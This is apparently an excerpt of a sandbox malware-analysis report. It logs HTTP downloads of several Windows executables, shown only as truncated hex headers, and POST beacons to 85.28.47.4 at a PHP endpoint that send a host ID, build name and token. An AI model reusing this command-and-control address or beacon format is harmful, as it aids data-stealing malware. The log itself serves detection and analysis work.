2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 05:37:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 05:37:21 GMTContent-Type: application/octet-streamContent-Length: 1903104Last-Modified: Thu, 27 Jun 2024 04:21:42 GMTConnection: keep-aliveETag: "667ce8d6-1d0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 13 50 4a 58 72 3e 19 58 72 3e 19 58 72 3e 19 03 1a 3d 18 56 72 3e 19 03 1a 3b 18 f8 72 3e 19 8d 1f 3a 18 4a 72 3e 19 8d 1f 3d 18 4e 72 3e 19 8d 1f 3b 18 2d 72 3e 19 03 1a 3a 18 4c 72 3e 19 03 1a 3f 18 4b 72 3e 19 58 72 3f 19 8c 72 3e 19 c3 1c 37 18 59 72 3e 19 c3 1c c1 19 59 72 3e 19 c3 1c 3c 18 59 72 3e 19 52 69 63 68 58 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 57 59 50 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 c4 01 00 00 00 00 00 00 70 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4b 00 00 04 00 00 13 f2 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 80 06 00 6a 00 00 00 00 70 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 51 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 50 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 06 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6f 61 77 6c 66 79 79 00 00 1a 00 00 60 31 00 00 f4 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6e 6b 72 76 63 76 68 00 10 00 00 00 60 4b 00 00 06 00 00 00 e2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4b 00 00 22 00 00 00 e8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJEHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 38 43 44 38 35 31 36 39 32 41 33 32 34 35 37 38 32 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 2d 2d 0d 0a Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="hwid"DB8CD851692A3245782482------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build"default------CGCFBFBGHDGDAKECAKJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 